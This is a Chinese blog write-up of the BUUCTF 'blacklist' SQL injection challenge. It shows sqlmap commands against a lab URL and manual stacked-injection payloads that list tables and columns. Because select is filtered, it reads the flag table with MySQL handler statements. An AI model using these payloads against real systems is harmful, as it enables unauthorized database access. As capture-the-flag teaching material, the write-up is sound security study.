buuctf:blacklistp

文章描述了一次针对靶机的SQL注入攻击过程,首先通过sqlmap发现注入点并确定数据库为supersqli,由于WAF的存在,无法继续使用工具,于是采用手工堆叠注入方法,暴露表名FlagHere和字段flag。由于select被过滤,使用handler读取了表FlagHere的数据。
摘要由CSDN通过智能技术生成

打开靶机。在这里插入图片描述
我们输入1'闭合一下试试。

在这里插入图片描述
可以看到应该是sql注入。我们用sqlmap扫描一下。
命令:sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1
请添加图片描述
可以看到存在注入点。我们爆库。命令:

sqlmap -u http://207e83af-288c-42a0-9c66-270c519d0466.node4.buuoj.cn:81/?inject=1 --dbs

请添加图片描述
可以看到爆出的数据库为:supersqli

往下的话就不能用sqlmap了因为有waf,我不会绕,我们手工注入。
已经知道数据库了,我们采用堆叠注入。爆表名:?inject=-1';use supersqli;show tables--+
后面的--+表示#的意思。
在这里插入图片描述
可以看到表名是FlagHere然后我们爆字段。?inject=-1';use supersqli;show columns from FlagHere--+
在这里插入图片描述
可以看到有一个flag字段。但是select被过滤了。无法继续堆叠注入。我们用handler读取。再知道表名是,可以用handler读取数据。格式为:handler 表名 open;handler 表名 read first;handler 表名 close;
所以我们payload:?inject=1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;
在这里插入图片描述
拿下。
养一下眼。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值